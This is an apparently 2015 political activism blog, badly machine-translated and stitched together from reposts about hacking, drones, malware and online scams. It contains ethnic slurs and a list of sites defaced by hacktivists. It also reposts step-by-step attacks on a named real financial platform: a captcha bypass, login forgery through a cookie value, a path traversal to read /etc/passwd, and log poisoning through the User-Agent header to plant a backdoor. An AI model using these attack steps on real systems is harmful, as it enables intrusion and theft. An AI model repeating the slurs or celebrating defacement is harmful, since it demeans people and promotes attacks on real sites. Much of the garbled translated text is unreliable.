2015年11月8日 星期日

- Update [08/11-2015] - this artificial disaster, we can not let the devil control no wonder the UN Legion, American Legion !?UAV was shot down for no reason, do not open these terrorist acts, is only a frenzied beast !! Original URL: [ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ] "how to crack a military UAV manual is online" -Tittle: Nevin Quick-virus tools and actually attached PDF Download !! Who is this thinking is not normal, please look our city / other countries in the military Minister WARNING !!! - -更新[08/11-2015]-這種人為的災禍,怎麼能任由魔鬼操控?!難怪我們聯合國軍團,美國軍團的無人機被無故擊落,不公開你們這些恐怖分子行為,是只有喪心病狂的畜牲!原網址:[ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ]"如何破解一個軍用無人機手冊已聯機"-內文竟附連結病毒工具和PDF下載!!這是誰的思維長得不正常!請我國/各國軍事大臣注意!!--Update[07/11-2015] Anonymous and hacker tribe - cause us a lot of curiosity...! - Add Hong Kong Apple Daily our favorite famous columnist writer Mr. Li Yi's brilliant comment! look at Hong Kong today,, Taiwan tomorrow, garbage Ma Ying-jeou betrayed us Taiwan people us,! we do not want this dirty Ma Ying-jeou, the most suitable for this crap dead in the mainland! -更新[07/11-2015]黑客與匿名部落--引起我們很多好奇之...!-加上香港蘋果日報我們最喜愛的著名專欄主筆李怡先生的精采評論!看今日香港,,明日台灣,垃圾馬英九出賣我們台灣人們,我們不要骯臟的馬英九,這垃圾死在內地最適宜!-*[06/11-2015]Update- By Anonymous Action=更新匿名行動 [ #opchina #ophk ]]- The Anonymous Legion said :"#OpHongKong 7 websites the Chinese government is under the control of Anonymous. You should have expected us. "- "[http://XXXXX.com ]-& By{ news2.mingpao.com }-Well done^^!Melody.Blog Thankgiving for all great" Support Human Right Org."~- [4/11-2015] Update - {1} In November, it is the death of celebrities "accidentally" tear down "the Berlin Wall history hero Schabowski death!" - Reported by the New Tang Dynasty Television - {2} by Anonymous Asia to show the public information - {3} An anonymous knight in the Mainland, he said:"I hate the Communist Party, hate Chinese traditional culture, hate friendships, hate leadership Niubi Hong Hong, hate authoritarianism.Hate Huitie not see posted , hate people do not understand the language of the environment on people who criticize forever hate refuse to listen refused to communicate the " left anger " and " right anger ", hate only ten minutes to observe the life of people on the judgment of others."--- The chivalrous brothers name is" Zola Zhou "also shared some exclusive high IT skills, more a very useful tool to attack the Communist Party of IP delicate, so we can join the fiber off 'Communist' and called "zoonotic" !! - Last by our favorite Hong Kong Apple Daily forum famous critic of " Mr. Li Yi "as the end of this Title article!-*All The World Lauguage*- -[4/11-2015]更新-{1}.在11月日是那位名人的逝世呢?"意外「推倒」柏林牆 歷史功臣沙博夫斯基逝世!"由新唐人電視台報導-{2}.由匿名亞洲給我們的資訊!-{3}.一位在內地的匿名俠客,他説:"我讨厌共产党,讨厌中国传统文化,讨厌称兄道弟,讨厌牛逼哄哄的领导,讨厌威权主义,讨厌回贴不看贴,讨厌不了解别人的语言环境就批判个没完的人,讨厌拒绝倾听拒绝沟通的左愤和右愤,讨厌只用十分钟观察就评判别人一生的人。"---這位俠義哥兒名稱是"Zola Zhou "還分享了一些獨家高技巧資訊,更有一款非常好用的攻擊共產黨IP的精巧工具,使我們也可一起加入纖滅'中共'又名為"畜共"!!-最後,是由我們最喜愛的香港蘋果日報論壇著名評論家李怡先生的文章作為本篇的結尾!-

*- Update [08/11-2015] - this artificial disaster, we can not let the devil control no wonder the UN Legion, American Legion !?UAV was shot down for no reason,  do not open these terrorist acts, is only a frenzied beast !! Original URL: [ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ] "how to crack a military UAV manual is online" -Tittle: Nevin Quick-virus tools and actually attached PDF Download !! Who is this thinking is not normal, please look our city /  other countries in the military Minister WARNING !!! -
-更新[08/11-2015]-這種人為的災禍,怎麼能任由魔鬼操控?!難怪我們聯合國軍團,美國軍團的無人機被無故擊落,不公開你們這些恐怖分子行為,是只有喪心病狂的畜牲!
OmniRat允許網絡罪犯哈克的Mac,Linux和Windows PC上和Android手機原網址:[ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ]"如何破解一個軍用無人機手冊已聯機"-內文竟附連結病毒工具和PDF下載!!這是誰的思維長得不正常!請我國/各國軍事大臣注意!!-
 

-Update[07/11-2015] Anonymous and hacker tribe - cause us a lot of curiosity...! - Add Hong Kong Apple Daily our favorite famous columnist writer Mr. Li Yi's brilliant comment! look at Hong Kong today,, Taiwan tomorrow, garbage Ma Ying-jeou betrayed us Taiwan people us,! we do not want this dirty Ma Ying-jeou, the most suitable for this crap dead in the mainland!
-更新[07/11-2015]黑客與匿名部落--引起我們很多好奇之...!-加上香港蘋果日報我們最喜愛的著名專欄主筆李怡先生的精采評論!看今日香港,,明日台灣,垃圾馬英九出賣我們台灣人們,我們不要骯臟的馬英九,這垃圾死在內地最適宜!-

[06/11-2015]Update- By Anonymous Action=更新匿名行動 [ #opchina #ophk ]]- The Anonymous Legion said :"#OpHongKong 7 websites the Chinese government is under the control of Anonymous. You should have expected us. "-
"[http://XXXXX.com ]-& By{ news2.mingpao.com }-Well done^^!Melody.Blog Thankgiving for all great" Support Human Right Org."~

- [4 / 11-2015] Update - {1} In November, it is the death of celebrities "accidentally" tear down "the Berlin Wall history hero Schabowski death!" - Reported by the New Tang Dynasty Television - {2} by Anonymous Asia to show the public information - {3} An anonymous knight in the Mainland, he said:"I hate the Communist Party, hate Chinese traditional culture, hate friendships, hate leadership Niubi Hong Hong, hate authoritarianism.Hate Huitie not see posted , hate people do not understand the language of the environment on people who criticize forever hate refuse to listen refused to communicate the " left anger " and " right  anger ", hate only ten minutes to observe the life of people on the judgment of others."--- The chivalrous brothers name is" Zola Zhou "also shared some exclusive high IT skills, more a very useful tool to attack the Communist Party of IP delicate, so we can join the fiber off 'Communist' and called "zoonotic" !! - Last by our favorite Hong Kong Apple Daily forum famous critic of " Mr. Li Yi "as the end of this Title article!-*All The World Lauguage*-
-[4/11-2015]更新-{1}.在11月日是那位名人的逝世呢?"意外「推倒」柏林牆 歷史功臣沙博夫斯基逝世!"由新唐人電視台報導-{2}.由匿名亞洲給我們的資訊!-{3}.一位在內地的匿名俠客,他説:"我讨厌共产党,讨厌中国传统文化,讨厌称兄道弟,讨厌牛逼哄哄的领导,讨厌威权主义,讨厌回贴不看贴,讨厌不了解别人的语言环境就批判个没完的人,讨厌拒绝倾听拒绝沟通的左愤和右愤,讨厌只用十分钟观察就评判别人一生的人。"---這位俠義哥兒名稱是"Zola Zhou "還分享了一些獨家高技巧資訊,更有一款非常好用的攻擊共產黨IP的精巧工具,使我們也可一起加入纖滅'中共'又名為"畜共"!!-最後,是由我們最喜愛的香港蘋果日報論壇著名評論家李怡先生的文章作為本篇的結尾!-*



**Please use the Google god of high-tech translator to translate your national / local language ah ^^ -
**請各位使用谷歌大神的高科技翻譯器來翻譯你們的國家/地方的語言啊^^-
**지역 / 국가 언어 ^^ 번역 하이테크 번역기의 구글 하나님을 사용하십시오 -
**Se il vous plaît utiliser le dieu Google de traducteur de haute technologie pour traduire votre ah langue nationale / locale ^^-
**あなたの国内/地域言語ああ^^翻訳するハイテクトランスレータのGoogleの神を使用してください -
**Будь ласка, використовуйте бога Google високотехнологічного перекладача, щоб перевести свій національним / регіональним мовою ах ^^-
**กรุณาใช้พระเจ้าของ Google แปลที่มีเทคโนโลยีสูงในการแปล / ชาติภาษาท้องถิ่นของคุณอา ^^-
**Si prega di utilizzare il dio Google Traduttore di high-tech per tradurre il vostro / ah lingua locale nazionale ^^-
**Fadlan isticmaal ilaah Google ee turjumaan farsmada heerka sare ah loo turjumi / ka ah luuqada maxaliga ah ee qaranka ^^-
**Gunakan dewa Google penerjemah berteknologi tinggi untuk menerjemahkan nasional / ah bahasa lokal ^^-
**Por favor, utilice el dios Google Traductor de alta tecnología para traducir su / ah nacional idioma local ^^-
**आफ्नो राष्ट्रिय / स्थानीय भाषा आह ^^ अनुवाद गर्न उच्च-प्रविधी अनुवादक को गुगल देवता प्रयोग गर्नुहोस् -
**Bonvolu uzi la Google dio de alta-tech tradukisto por traduki vian nacian / lokan lingvon ah ^^-

 What a fuck with the china-pig attack to  The JAPAN  !!We can see what you're , you are all like the theif  to stolen...every country...
#Fuch Chinaman fifty cents party @!

 https://www.facebook.com/iamafzalahmad/
 Afzal Ahmad 分享了 1 條連結
Hackers could use this how-to guide for hijacking military drones, an Israeli…
fossbytes.com|作者:Adarsh Verma

  https://www.facebook.com/iamafzalahmad/

 =====
 http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/

How to Hack a Military Drone Manual is Already Online

by on drone
 The information needed to hack a sophisticated military drone is already available on internet and hackers could use this how-to guide for hijacking military drones, an Israeli defense manufacturer said earlier this week. This news comes in the wake of the increasing warnings of drone hacking.
 Drones are the new warfare tools as they are cost and life-saving by performing multiple functions with ease. A manual named “The Requirements for Successful GPS Spoofing Attacks” was published back in 2011 just a month before the CIA drone downing by Iran. Israel Aerospace Industries cyber-programs director Esti Peshin pointed out the possibility of the use of this document in the downing.
Peshin said, “It’s (How to Hack a Military Drone Manual) a PDF file…essentially a blueprint for hackers.” “You can Google, just look up ‘Tippenhauer’ – it’s the first result in Google. Look up ‘UAV cyberattacks’ – it’s the third one. ‘UAV GPS spoofing attacks’ – the first one,” she added.
The study explains the way to feed the GPS system to fake signals so that drones end up losing the ability to calculate its coordinates. In the report, Peshin says that the goal of the study was to point out the “effective receiver-based countermeasures, which are not implemented yet in current standard GPS receivers.”
The PDF file published didn’t mean any harm but hackers could have possibly exploited the instructions given before the drone manufacturers recognize the risks and fortified the drones.
At the end of the article, they had listed many UAVs and told which were riskier than the other by the way.
Currently, the Pentagon is working to shield the UAV surveillance and navigation system from the outside interference.
Read out extensive coverage on drones and know about the latest advancements being made in the field.
Visit this link for the 2011 PDF file on how to hack a military drone.
 http://www.cs.ox.ac.uk/files/6489/gps.pdf
Get Pure Python Hacker Bundle here
 https://stacksocial.com/sales/pure-python-hacker-bundle-master-python-django-programming?aid=a-777o79wh

Get the best deals on Drones:



 =====
 http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/

如何破解一個軍用無人機手冊已聯機

drone
 是在互聯網上已經可以破解複雜的軍用無人駕駛飛機所需要的信息,而黑客可以利用該如何引導劫持軍用無人機,以色列國防生產商在本週早些時候表示。 這個消息是在無人機黑客​​日益警告之後。
 Ðrones是新戰工具,因為它們是通過執行多種功能容易成本和救生。 名為“成功進行GPS欺騙攻擊要求”手動短短的一個月出版早在2011年,美國中央情報局無人駕駛飛機擊落伊朗之前。 以色列航空航天工業公司的網絡,節目總監ESTI Peshin指出了擊落使用本文件的可能性。

 Peshin說,“這是(如何破解一個軍用無人駕駛飛機手冊)一個PDF文件 ......基本上是一個藍圖黑客。”“你可以谷歌,只看了”Tippenhauer“ -這是第一個結果在谷歌。 查一查“無人機網絡攻擊” -這是第三個。 “無人機的GPS欺騙攻擊” -第一位的,“她補充說。
這項研究解釋了對GPS系統輸送到假信號,使無人機最終失去來計算其坐標的能力的方式。 在報告中,Peshin說,這項研究的目的是指出“有效基於接收器的對策,其未在當前的標準GPS接收機尚未實現。”
公佈的PDF文件並不意味著任何傷害,但黑客可能利用可能的指示之前給出無人機製造商認識到風險和強化無人機。
在文章的最後,他們列舉了大量的無人機,並告訴它比其他更具風險的方式。
目前,五角大樓正在努力屏蔽來自外界的干擾無人機監視和導航系統。
讀出覆蓋廣泛的無人機和了解正在該領域的最新進展。
訪問此鏈接,為2011年的PDF文件,對如何破解軍事無人機。
獲取純Python黑客捆綁在這裡
 
 獲取無人機上最優惠的價格:


 =====


 Elite Cyber Security 分享了 Anonymous support for sharing Events and Ops活動


 Elite Cyber Security 轉貼自 Time to Unite
WE WOULD LIKE TO TAKE A MINUTE OR TWO TO THANK ALL OF YOU WHO TURNED OUT FOR THIS YEARS MILLION MASK MARCH…
youtube.com


 Elite Cyber Security
At HackRead, we have been reporting on the dangers of Remote Access…
hackread.com|由 Carolina Oliveira.
 

 OmniRat Allows Cyber Criminals Hack Mac, Linux, Windows PC and Android Phones


OmniRat Allows Cyber Criminals Hack Mac, Linux, Windows PC and Android Phones Image: Katie Zhuang, Duke University.

At HackRead, we have been reporting on the dangers of Remote Access Trojan (RAT) which sits behind your OS, records and send the sessions to the attacker.
One report that shock the readers was about the Canadian couple who had their laptop camera hacked with the help of RAT and recorded each and everything they did in their room.
Now, OmniRAT is a new threat to the users, as hackers have found a new way to enter into their devices. No matter if you are using MAC, Windows or Andriod operating system you are under a threat.
RAT stands for Remote Access Trojan and is the latest in the family of malware developed by the hackers. Hackers already have created Droid Jack, AndroRAT, DarkComet, and njRAT. Now they have unveiled OmniRAT which according to the hackers can steal data and spy or control the user’s phone.
When the OmniRAT was analyzed for its way of getting into the system it was found that it gets into the devices via a client component that starts communicating with a server counterpart which allows hackers to make the phone do things they want it to.
What’s even more surprising about this RAT is that it’s been offered at a far cheaper price than the earlier RATs. Currently, it’s been sold at a price ranging between $25 and $50.
Screenshot shows how OmniRAT-infected app asks for installation (Image Source: Avast)
Screenshot shows how OmniRAT-infected app asks for installation (Image Source: Avast)
omnirat-allows-cyber-criminals-hack-mac-linux-windows-pc-and-android-phones-5
Here are the permissions the infected app asks for Image Source: Avast)
Though, these software are not illegal because they are used by programmers for testing but if they are used for a malicious purpose they are deemed illegal. Meaning these RATs can be easily bought by anyone which really is the best aspect for the hackers.
In August, Avast found this OmniRAT in action when they analyzed an unusual SMS campaign where they found an SMS send to the victims that they have received an MMS but cannot be send due to Stagefright vulnerability.
So, in order to view the MMS victim is asked to follow a Bitly link which takes them to downloading an apk file if still alarms bells are not rung in the user’s head, the user downloads the file but before downloading it asks for all the permission it needs to get into the phone (Most users never pay attention to the permissions app ask and pay the price).
Once installed it says “Successfully modified” and an icon by the name of “MMS retrieve” comes on the home screen of the phone by this time the user have granted access to his phone and hackers are now control.


OmniRAT | Android Remote Administration Tool | Android Client

XilluX
Here again only one recommendation please be very careful in downloading any files from URLs that belong to third parties and must always have your anti-virus updated so you get the warning from anti-virus.


Carolina

Carolina works for HackRead as a technical writer. She is a Brazilian traveller who has been to almost every country around the world. She has a keen interest in technology, gadgets and social media.



OmniRat允許網絡罪犯哈克的Mac,Linux和Windows PC上和Android手機

 在HackRead,我們一直在報導上的遠程訪問木馬(RAT),它位於後面您的操作系統,記錄並發送會話攻擊的危險。
那驚世駭俗的讀者有一份報告是對加拿大夫婦誰了他們的筆記本電腦攝像頭黑客攻擊與大鼠的幫助,並記錄每次在自己的房間做了一切。
現在,OmniRAT是一個新的威脅,給用戶,因為黑客已經找到一種新的方式進入到他們的設備。 無論您使用的是MAC,此事的Windows安卓操作系統您正在威脅。
RAT代表遠程訪問木馬是最新的惡意軟件家族由黑客開發的。 黑客已經創造了Droid的傑克,AndroRAT,DarkComet和njRAT。 現在,他們已經推出了OmniRAT它根據黑客可以竊取數據和間諜或控制用戶的手機。
當OmniRAT被獲取到系統中的它的方式進行分析後發現,它進入經由客戶端組件,開始與服務器對應,允許黑客使電話通信的?他們希望它的東西的設備。
什麼是更令人驚訝的關於這個RAT是,它提供了以更便宜的價格比以前的作用。 目前,它已經在價格從$ 25到$ 50個不等出售。
截圖顯示了如何OmniRAT感染的應用程序要求進行安裝(圖片來源:Avast的)
截圖顯示了如何OmniRAT感染的應用程序要求進行安裝(圖片來源:Avast的
omn​​irat  - 允許 - 網絡犯罪分子,黑客-MAC-的Linux-Windows的PC和 - 的Andr​​oid手機-5
這裡有被感染的應用程序要求的圖像來源的權限:Avast的)
雖然,這些軟件並不違法,因為他們是為測試使用的程序員,但如果它們被用於惡意目的,他們被視為非法。 這意味著這些老鼠也會很容易被人這確實是黑客的最好的方面買的。
今年八月,Avast的發現了這個OmniRAT在行動時,他們分析了一個不尋常的短信活動,他們發現了一個手機短信發送給受害者,他們已經收到了彩信,但不能發送,由於Stagefright漏洞。
因此,為了查看彩信受害者被要求遵循Bitly鏈接,帶他們去下載一個apk文件,如果仍報警的鐘聲沒有在用戶的頭上響起,用戶下載該文件,但在下載之前,它要求所有的權限它需要進入手機(大多數用戶從來沒有注意權限的應用程序要求和付出的代價)。
一旦安裝它說:“修改成功”和名稱的圖標“MMS檢索”這時候,用戶都有權訪問他的電話和黑客現在來控制手機的主屏幕上。


OmniRAT | Android Remote Administration Tool | Android Client

XilluX
 

卡羅來納州

卡羅來納州工程HackRead作為一個技術作家。 她是一個巴西人旅客誰一直在幾乎每一個國家在世界各地。 她在技術,工具和社交媒體產生了濃厚興趣。

 =====
 
 Elite Cyber Security
Support HK Anoymous~
Target Down..
新民黨New People's Party


 

 Elite Cyber Security
·
 

 Elite Cyber Security

HAckeD By HKGTW@ECS
http://zd.oneedu.cn/ecshkgtw.html
http://www.shchangyuan.com/ecshkgtw.html
http://habeiedu.com/ecshkgtw.html
http://gz.56it168.com/ecshkgtw.html
http://jxaqpx.com/ecshkgtw.html
http://jxjy.gdjspx.com/ecshkgtw.html
http://www.dgjtpt.com/ecshkgtw.html
http://zsb.jlnu.edu.cn:8080/ecshkgtw.html


 Elite Cyber Security

http://www.nxyzsyx.com:8088/hkgtw.html

 Elite Cyber Security

our520.com
 

=====





























 =====

 We really feel tired,
Curious, We want to know why we are not being Open technology fund sponsored?

Each tribe has a different style
We are not planned, random...
With each find anything in the network, file sharing will naturally ground pole in the tribe,

Look now Hong Kong is being occupied,
Have you ever thought that you were born in the state of freedom of transit,
Exhausted every day, eating toxic food, toxic lead levels that exceed drinking water standards,
With the toxic waste daily home goods, you are expected to give yourselves how long to be alive?

See these man-made scourges of today, is there one will assailants Xi Jinping, and Leung Chun-ying pull towards international tribunal ??!

Bin now people feel cold, no fairness, no system, life can be assailants stampede.

Positive moral degeneration....
Shameful...


=====

我們真的感到疲倦,
好奇的,想知道我們為何不被公開科技基金贊助?

每個部落有不同的風格
我們是没計劃的,隨機的...
隨著每一次在網絡中找到甚麽,分享便自然地舖文在部落中,

看現在的香港地區正正在淪陷,
你們有否想過你們不是出生在自由的國渡,
每天疲於奔命,吃著有毒的食物,喝著有毒的含鉛量超過標準的水,
用著含毒垃圾的日常家品,你們預計得到自己能活著多久嗎?

看現今這些人造禍害,究竟有沒有人會把兇徒習近平,和梁振英拉往國際法庭審判??!

現賔令人感到冷漠,沒有公平,沒有體制,生命可被兇徒踩踏.
正道德觀淪亡....
可恥的...


=====


 私たちは本当に疲れを感じます、好奇心が強い、我々はオープンテクノロジー基金後援されていない理由を知りたいですか?
各部族は異なるスタイルを持っています我々は、ランダムに計画されていません...各ネットワークに何かを見つけると、ファイル共有は、自然部族にポールを接地し、
香港が占有されている今、見て、あなたは今まであなたがトランジットの自由の状態で生まれたことを考えています、水基準を飲ん超える有毒な食品、有毒な鉛濃度を食べて、毎日疲れ果て、有害廃棄物の毎日の家庭用品で、あなたはどのくらい生きている自分自身を与えることが期待されていますか?
今日のこれらの人工災いを参照してください、加害者習近平、とレオンチョン・英国際法廷に向かって引っ張ってくるものがあります?!
ビンは今、人々は寒さを感じる、何の公平性、ないシステムは、人生は加害者殺到することはできません。正のモラルの低下....恥ずかしいです...


 =====

 *- Update [08/11-2015] - this artificial disaster, we can not let the devil control no wonder the UN Legion, American Legion !?UAV was shot down for no reason,  do not open these terrorist acts, is only a frenzied beast !! Original URL: [ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ] "how to crack a military UAV manual is online" -Tittle: Nevin Quick-virus tools and actually attached PDF Download !! Who is this thinking is not normal, please look our city /  other countries in the military Minister WARNING !!! -
-更新[08/11-2015]-這種人為的災禍,怎麼能任由魔鬼操控?!難怪我們聯合國軍團,美國軍團的無人機被無故擊落,不公開你們這些恐怖分子行為,是只有喪心病狂的畜牲!原網址:[ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ]"如何破解一個軍用無人機手冊已聯機"-內文竟附連結病毒工具和PDF下載!!這是誰的思維長得不正常!請我國/各國軍事大臣注意!!

  http://melody-free-shaing.blogspot.com/2015/11/4-11-2015-update-1-in-november-it-is.html
 ===Melody.Blog===FOLLOW   FOLLOW===>/
===#################################################

 #Fuch Chinaman fifty cents party @
 http://silic.org

Hang Seng Finance cloud platform network ihoms Multiple vulnerabilities

Hang Seng Finance cloud platform ihoms belong more well-known domestic financial platform, and learning Branch black industry practitioners a forum to study subjects submitted anonymously Multiple vulnerabilities Hang Seng ihoms official website, after learning of the test subjects VIP core team discovered vulnerabilities real and effective, get more servers and database rights.
 

 The anonymous hackers attempt to study subjects elaborated course of its invasion a few months ago, the study subjects have tested the vulnerability, about the verification code dummy, any landing and files containing several loopholes.

I. Verification Code dummy
To see a code: typeof verify === 'function' && verify (true)
II. Any landing
Site authors write in Cookie SMS dynamic password inside, although it can not arbitrarily change the password, but it can be any landing.

Just register an account on the site, the use of dynamic password, get a SMS password, and then make changes in the cookie can be any landing.
For example at the end of Cookie plus DY_PW_NA = 078B61FE7D0E466CB90D5147E71F2A0 so that you can arbitrarily landed
III. Site contains loopholes
Modify the site the cookie language template, and the value is set to
../../../../../../../../../../../../../../../../ .. /../../../../../../../../../../../../../../../../. ./../../../../etc/passwd

Hackers are another domain owned by Hang Seng e hundsun.com intrusion of the site and the company's main stand in the same subnet, the domain of a few sub-domain in / home / html, then read the error log location / usr / local / apache2 / logs / error_log

Set UA malicious backdoor code, visit 404 pages, you can get permission.
//Silic.Org


 =====
 http://silic.org


金融云平台恒生网络ihoms多处漏洞

金融云平台恒生ihoms属于国产较为知名的金融平台了,习科论坛某黑色产业从业者匿名向习科提交了恒生ihoms官网的多处漏洞,经过习科VIP核心团队的测试发现,漏洞真实有效,可获得服务器及数据库以上的权限。
 

 該匿名黑客向習科闡述了其幾個月以前嘗試入侵的過程,習科簡單測試了一下漏洞,大概有驗證碼虛設、任意登陸和文件包含幾處漏洞。

I.驗證碼虛設
就看一句代碼:typeof verify === 'function' && verify(true)
II.任意登陸
網站作者把短信動態密碼寫在Cookie裡面的,雖然不能任意更改密碼,但是卻可以任意登陸。

在網站隨便註冊一個賬號,使用動態密碼登陸,獲取一個短信密碼,然後在cookie中做修改就可以任意登陸。
例如在Cookie末尾加上DY_PW_NA=078B61FE7D0E466CB90D5147E71F2A0這樣就可以任意登陸了
III.網站包含漏洞
修改網站cookie中的語言模板,並將值設定為
../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../. ./../../../../etc/passwd

黑客是通過恆生電子旗下另一個域名hundsun.com進行入侵的,該站點與公司主站在同一個子網下,這個域名的幾個子域名都在/home/html,然後又讀到了錯誤日誌的位置/ usr/local/apache2/logs/error_log

設置UA為惡意後門代碼,訪問404頁面,即可獲得權限。
//Silic.


 =====
 http://silic.org/

Internet police inaction: the number of Chinese Professional Network cheat

Today, social networking and almost every young person has put a hook. QQ ten years from development to the present, instant messaging, SNS community APP, even one-night stands, the city's software are emerging about guns.
However, in the Chinese environment, it had generally very difficult. Thus spawned countless speculation robbed own economic wealth, life goals dig pit, wins you a million troops venture deal is silver, which is the occupation liar gang.
 
 So inseparable from our mobile network, gangs are also more and more frauds, the above message is one of the oldest means of network cheated, then how many Chinese network lie? Do not worry, Xiaobian to give everyone a grilled steak.

Network lie 2: Wine holder
I believe there are people who would like to receive a similar proportion of such drift bottles:

Bottle type is the same city or exchanges bottle, the contents probably for me to call XXX, which I sell clothing / do cashier / accounting / XXX in Nana, How about you?
Once you reply, the other of the first step to succeed, she'll ask you to phone number (note not QQ number), then you come out to play all kinds about working unhappy ah, feelings ring true ah, here itch ah.
Such frauds occur at about gun APP is not very fire, pretending to appear online one-night stand, take you to bars, nightclubs, KTV consumption.
Bang ~ Mr. Hello, this is Mr. Rafi - bang - you and the lady's Hello, this is for you and the lady of XO ~

And in fact it is a team or one or two people, hiring a gang of little old man or a mouse to pull the foot Tahan, according to notepad contents inside, throwing bottles everywhere, and then follow the notepad inside the preset information back to you, and then you phone sold wine holder nightclubs and the like, and then train on the down.
This type of network cheat include: QQ nearby who drift bottles and so on.
With the diversification of software about guns, except in the vicinity of those who get money, and cheat feelings, such as people in the vicinity among prostitutes, do you think she looks and APP photos a look, and you think you're pretty sister about, in fact, to talk back to you and you are to pull the foot Tahan.
According to the frequency of occurrence and around nightclubs, wine bar number of child care, the subjective view such groups around the country a total of less than ten thousand.
Net cheat III: Aventure
Figure childhood teacher taught us to speak, small plug to talk about as well.
One day we went to the magic business, whether it is or what QQ, with paying members greeting will always fly a bit of it, so hi a circle, vowing to become a radius of about 5 miles guns.
So. . "Today a good mood, you add it to the micro-channel", "micro-channel generally do not join." So there in the above dialogue (in fact, my own brain complement).
A group calling itself the legendary 176 family business heir to a certain height Theatre Academy Dance freshmen out about rice (Pao), suddenly spotted a piece of clothing Taobao Before that, he sent ¥ 136 yet.
Brother gave a red envelope chant ~ various coquetry various cheat. . .

Expose: 1, have decided to come out about food, and send voice, video chat first ah ~ 2, Taobao your sister ah, the baby connecting sent ah, obviously micro letter of baby shots and the actual shop inside the price discrepancy, Theme Time None of the 3, phone number (this later said) to 4, micro-channel payment method other than red, such as QQ (check group library), Alipay (men and certification).
 
QQ 210559792 here as before is gender male.
Some people may ask why talk so much, the answer is, to say the more necessary in order to round the front of the lie spread more lies. Here's the network that he lied to girlfriends and her mother in the side, a mere 100 dollars are also used by micro letter? "Brother" Ask information appears in Alipay borrow 100 dollars is not faster? Micro letter the next day arrival yet.
In addition, there are many similar modus operandi, such as "Tomorrow examination seeking blessings," "exam smashed seek comfort," "wallet seek sponsorship" ....
In short, it is loaded goddess, poor equipment, installed Aventure, loaded!

On the map such as this renbing1314 you can try, before they ask to know what he wanted, and are able to find a suspicious points.
Such red crooks are mainly concentrated in Shanghai, Zhejiang and Fujian Soviet area, particularly in the devil are the hardest hit.
Through investigation, fraud gang form the same way as with dedicated buy a phone card (black card), a special charge of registered micro signal, as well as maintenance of micro-channel dedicated circle of friends, made a dynamic time to time, people think it really It is a goddess. The core layer is deception layer, belonging to a minority, usually several devices, shifts login account chatted Sao chat about guns, gun cheat cheat cheat love red.
(This figure is strongly keep micro-channel actor Xiao Bian statement, "Why encountered micro-letter cheater always me? Because my micro signal only four letters, especially likely to be found to")
Well, in front of the micro-channel train not finished, there are specialized violent exhaustive micro-channel telephone number registered Canadian friends.
To conclude, based on the division of the train, the amount to be red (opening is ¥ 188, mouth going ¥ 136), the competent deduce micro-channel cheated amount of such networks would be easier to reach one million.
Net cheat 3: calls cheat
Users unfamiliar street has recently prompted calls carefully liar, I feel strange, so we deliberately investigating a lot.
Also found a pile of his own people pretending to the goddess, send some weird dynamic neighborhood, there are pictures in this my dying XXXXX, who gave me charge calls ah, help me, how how the.

More dynamic, like "X XX, I came all the way to where Nana to find you, you finish the damn animal I ran, I calls is gone, who gave me charge calls me tonight to whom sleep ... "
This is more than funny funny than the state than is actually there are a bunch of people in the back replies, "sister to brother here," "what beauty, whisper." . .
New this year is the frauds together and engage in a pile outside the phone number, etc. through online business for "Stop Protection", when dialed hear is down, but not actually delinquent, use the sympathy of others (Later, the temptation becomes about guns), whether you charge 100 or 10,000 to him, the phone number is shutdown. Etc. cheated everyone to this phone number filled the bill 100, the gang would sell the card 50 dollars, there are 1,000 local tyrant charge it more exciting.
 
Such deception according to the physical location of the roaming unfamiliar street, basically now all have a second and third tier cities, small towns and even individual also appeared, in charge of this group is estimated to be counted in thousands.
The wisdom of the Chinese people is really endless, which is used in the right path thoughts are crooked brains flowers above, of course, in addition to said Xiaobian swindler gangs, there are Internet police.
Frontier recover recovery overseas thanks to the inspectors, however internal control of public opinion to the government in addition to the network when the police dog who was also gone. Is really a dog, let the dog was crook up bite can bark twice.
to sum up:
Net cheat do not expect those who fight to control public opinion, the government's net Jinggou, and anti-fire security network needs to cheat on their own.
As a network security practitioners, the network is their own family, should be entertaining to play bad network cheat, Recommended reading: two-five minutes to determine the starting point for phishing sites http://bbs.blackbap.org/thread-7688-1- 1.html
//Silic.Org


 =====
http://silic.org/

網警無作為:中國有多少職業網騙

如今網絡社交已經和幾乎每個青年人掛上了鉤。 從QQ發展十幾年到如今,即時通訊https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvKtoW0-iN6frft_-JqZC-qGG9EyavZjV4belY5y8a8KF-vV0Ngf1jkWzloNYYwaP4WWSKFZRk415Ffaz8mXJkM_Wi55pdMkmIZUPb1VDybsqcyM9sI83rUw8n4o9ILkq0MJ1mzXg/s1600/2015-11-09_203428.png工具、SNS社區APP,甚至一夜情、同城約炮的軟件都層出不窮。
然而,在中國的大環境下,大家過的普遍很艱難。 於是催生了無數的投機倒把劫貧富濟自己,人生目標挖大坑,奪你銀子沒商量的百萬創業大軍,也就是職業騙子團伙。

 
 移動網絡這麼離不開大家,團伙們行騙手段也越來越多,上面的短信是最古老的網騙手段之一了,那麼中國究竟有多少網騙? 別著急,小編來給大家扒一扒。

網騙2:酒托
相信有想多比例的人收到過類似這樣的漂流瓶:

瓶子類型為同城或者交往瓶,內容大概為我叫XXX,我在哪哪哪賣服裝/做收銀/會計/XXX的,你呢?
一旦你回復了,對方的第一步就得逞了,她會問你要電話號碼(注意不是QQ號),然後各種約你出來玩,工作不如意啊,感情不順啊,下面癢癢啊。
這類行騙手段出現在約炮APP還不是很火的時候,假裝出現網上一夜情,帶你去酒吧、夜店、KTV消費。
砰~先生您好,這是您和這位小姐的拉菲~砰~先生你好,這是您和這位小姐的XO~

而事實上是一個團隊或者一兩個人,僱傭一幫會點點鼠標的老大爺或者摳腳大漢,按照記事本里面的內容,到處扔瓶子,然後按照記事本里面預置的信息回复你,然後把你的電話賣給夜店之類的酒托,然後一條龍就下來了。
這種類型的網騙包括:QQ附近的人,漂流瓶等等。
